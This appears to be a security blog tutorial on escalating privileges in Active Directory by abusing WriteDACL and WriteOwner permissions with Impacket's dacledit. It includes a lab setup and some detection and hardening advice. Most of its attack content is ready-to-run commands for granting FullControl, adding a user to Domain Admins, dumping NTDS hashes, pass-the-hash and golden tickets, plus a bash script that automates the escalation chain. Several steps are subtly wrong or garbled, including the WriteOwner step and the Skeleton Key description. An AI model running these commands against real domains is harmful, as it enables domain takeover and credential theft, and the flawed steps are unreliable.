Listen to this Post

Introduction:
Active Directory (AD) security relies heavily on Discretionary Access Control Lists (DACLs) to define permissions on objects like users, groups, and computers. However, misconfigured DACLs—such as granting WriteDACL, WriteOwner, or FullControl to non-privileged users—create critical privilege escalation pathways. Attackers leverage tools like Impacket’s `dacledit` to modify these ACLs, granting themselves Domain Admin rights or resetting passwords without current credentials. Understanding these attacks is essential for both red teamers and blue teams to harden AD environments.
Learning Objectives:
- Understand how DACL misconfigurations in Active Directory enable privilege escalation.
- Learn to enumerate and abuse WriteDACL, WriteOwner, and FullControl permissions using Impacket-dacledit.
- Implement detection and mitigation strategies to prevent DACL-based attacks.
You Should Know:
1. Setting Up Your Lab for DACL Abuse
Before exploiting DACLs, you need a controlled Active Directory lab environment. Use virtualization software (VMware/VirtualBox) with a domain controller (Windows Server 2019/2022) and a client machine (Windows 10/11). Install Kali Linux as your attack machine.
Step‑by‑step guide:
- Deploy Domain Controller – Install Windows Server, promote to domain controller (e.g.,
lab.local), create a standard user (e.g.,john.doe). - Install Impacket on Kali – Impacket is included in Kali by default. Update it:
sudo apt update && sudo apt install impacket-scripts Or from source for latest features git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install
- Create a Misconfiguration – On the DC, open `dsacls` or ADUC, delegate `WriteDACL` permission over the `Domain Admins` group to
john.doe.
– Using PowerShell as Domain Admin:
$group = Get-ADGroup "Domain Admins" $user = Get-ADUser "john.doe" $acl = Get-Acl "AD:$($group.DistinguishedName)" $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($user.SID, "WriteDACL", "Allow") $acl.AddAccessRule($rule) Set-Acl "AD:$($group.DistinguishedName)" $acl
4. Verify – On Kali, test connectivity: `ping dc.lab.local` and crackmapexec smb dc.lab.local -u john.doe -p 'Password123'.
- Enumerating AD Object Permissions with PowerView and BloodHound
You must identify which objects you can modify. Use PowerView (part of PowerSploit) on a Windows machine or BloodHound for visualization.
Step‑by‑step guide (Linux/Windows):
- From a compromised Windows machine (PowerView):
Import module Import-Module .\PowerView.ps1 Find all ACLs for the current user Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser -Identity john.doe).objectsid} - From Kali using BloodHound (recommended):
Install BloodHound and Neo4j sudo apt install bloodhound neo4j sudo neo4j console Run SharpHound on Windows to collect data Transfer the zip to Kali and import into BloodHound Query: MATCH p=(u:User)-[r:WriteDacl|WriteOwner|GenericAll]->(g:Group) RETURN p
- Using Impacket’s own `dacledit` to enumerate:
`dacledit.py` can also list ACEs. Syntax:
dacledit.py -action read -target "CN=Domain Admins,CN=Users,DC=lab,DC=local" -delegate-to "CN=Users,DC=lab,DC=local" lab.local/john.doe:'Password123'@dc.lab.local
- Abusing WriteDACL to Grant FullControl Over a Group
WriteDACL allows you to modify the ACL of a target object. Attackers can add an ACE that grants themselves FullControl, then add their user to the protected group.
Step‑by‑step guide using Impacket-dacledit:
- Identify target – Suppose `john.doe` has WriteDACL over
Domain Admins.
2. Grant FullControl to `john.doe` over `Domain Admins`:
dacledit.py -action write -rights FullControl -principal "lab.local/john.doe" -target "CN=Domain Admins,CN=Users,DC=lab,DC=local" lab.local/john.doe:'Password123'@dc.lab.local
3. Now add `john.doe` to Domain Admins using `net rpc` or adduser.py:
net rpc group addmem "Domain Admins" john.doe -U "lab.local/john.doe%Password123" -S dc.lab.local
4. Verify – `net rpc group members “Domain Admins” -U “lab.local/john.doe%Password123” -S dc.lab.local` should show the user.
Mitigation: Audit ACL changes. Monitor Event ID 5136 (Directory Service Changes) for modifications to sensitive groups.
- WriteOwner Abuse: Taking Ownership of a Domain Object
If a user has WriteOwner permission on an object (e.g., a user account), they can change the owner to themselves. The owner automatically has FullControl, enabling password resets or further privilege escalation.
Step‑by‑step guide:
1. Check WriteOwner – Use BloodHound or PowerView:
`Get-DomainObjectAcl -Identity “target_user” | Where-Object {$_.ActiveDirectoryRights -like “WriteOwner”}`
2. Change owner using Impacket-dacledit:
dacledit.py -action write -rights WriteOwner -principal "lab.local/john.doe" -target "CN=TargetUser,CN=Users,DC=lab,DC=local" lab.local/john.doe:'Password123'@dc.lab.local
3. After becoming owner, you now have FullControl. Reset the target user’s password without knowing current one:
smbpasswd -r dc.lab.local -U target_user -s -new 'NewPass123!' -old ''
Or use Impacket’s `secretsdump.py` to extract hashes.
5. Post-Exploitation: Dumping Credentials and Lateral Movement
Once you have Domain Admin privileges, the domain is compromised. Use Impacket’s suite for further actions.
Step‑by‑step guide:
- Dump NTDS.dit – `secretsdump.py lab.local/administrator:’AdminPass’@dc.lab.local -just-dc`
– Pass‑the‑Hash – `psexec.py lab.local/administrator@target-machine -hashes aad3b435b51404eeaad3b435b51404ee:hash`
– Create Golden Ticket – Use `ticketer.py` after obtaining krbtgt hash. - Persist via Skeleton Key – `mimikatz` or `lsadump::dcshadow` (requires domain admin).
Detection: Enable advanced audit policies (Audit Detailed Directory Service Replication, Audit Kerberos Authentication Service). Deploy SIEM rules for unusual `dacledit` network traffic (port 445, 135, RPC calls). Monitor for rapid changes to group memberships.
6. Defensive Hardening: Removing Dangerous DACLs and Monitoring
Blue teams must proactively scan for and remove dangerous ACL misconfigurations.
Step‑by‑step guide:
- Identify risky ACEs using PowerShell:
$sensitiveObjects = @("Domain Admins","Enterprise Admins","Schema Admins","Administrator") foreach ($obj in $sensitiveObjects) { Get-Acl "AD:CN=$obj,CN=Users,DC=lab,DC=local" | Select -ExpandProperty Access | Where-Object {$<em>.IdentityReference -notlike "Domain Admins" -and $</em>.ActiveDirectoryRights -match "WriteDACL|WriteOwner|GenericAll"} } - Remove excessive permissions – Use `dsacls` or ADUC.
- Implement AD Administrative Tier Model – Separate privileged accounts, use Privileged Access Workstations (PAWs).
- Deploy Microsoft Defender for Identity – Detects ACL modifications and suspicious Impacket tool usage.
7. Simulating the Attack for Red Team Exercises
To practice, write a bash script that automates the WriteDACL abuse chain.
!/bin/bash Usage: ./dacledit_poc.sh domain controller user password target_group DOMAIN=$1 DC=$2 USER=$3 PASS=$4 TARGET=$5 echo "[] Granting FullControl to $USER on $TARGET" dacledit.py -action write -rights FullControl -principal "$DOMAIN/$USER" -target "$TARGET" "$DOMAIN/$USER:$PASS@$DC" echo "[] Adding $USER to $TARGET" net rpc group addmem "$(echo $TARGET | cut -d',' -f1 | cut -d'=' -f2)" "$USER" -U "$DOMAIN/$USER%$PASS" -S $DC echo "[] Verifying membership" net rpc group members "$(echo $TARGET | cut -d',' -f1 | cut -d'=' -f2)" -U "$DOMAIN/$USER%$PASS" -S $DC
What Undercode Say:
- Key Takeaway 1: WriteDACL and WriteOwner are among the most dangerous misconfigurations in Active Directory – they allow a low-privileged user to fully compromise the domain without any exploit or vulnerability.
- Key Takeaway 2: Impacket’s `dacledit.py` provides a reliable, scriptable method for both attacking and testing AD permissions. Defenders must regularly audit DACLs using tools like BloodHound and PowerShell, and implement real-time monitoring for ACE modifications.
Analysis: The rise of DACL-based attacks reflects a shift from memory corruption exploits to “living off the land” and misconfiguration abuse. Many organizations focus on patching and malware defense while ignoring internal permission sprawl. A single overlooked WriteDACL delegation can hand over the keys to the kingdom. Red teams should prioritize ACL enumeration; blue teams must treat AD as a critical data source, not just an authentication service. Integrating DACL hygiene into regular security posture reviews is non‑negotiable.
Prediction:
As organizations adopt zero-trust and cloud‑hybrid identities, misconfigured ACLs will remain a top initial access vector. Attackers will increasingly automate DACL enumeration with tools like BloodHound CE and Purple Knight, and Impacket will evolve to support Azure AD permissions. Microsoft may introduce “break‑glass” ACL auditing by default, but legacy on‑prem AD environments will remain vulnerable for years. Expect to see DACL abuse integrated into major ransomware playbooks as a stealthy domain escalation method.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Nishaasharmaa Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


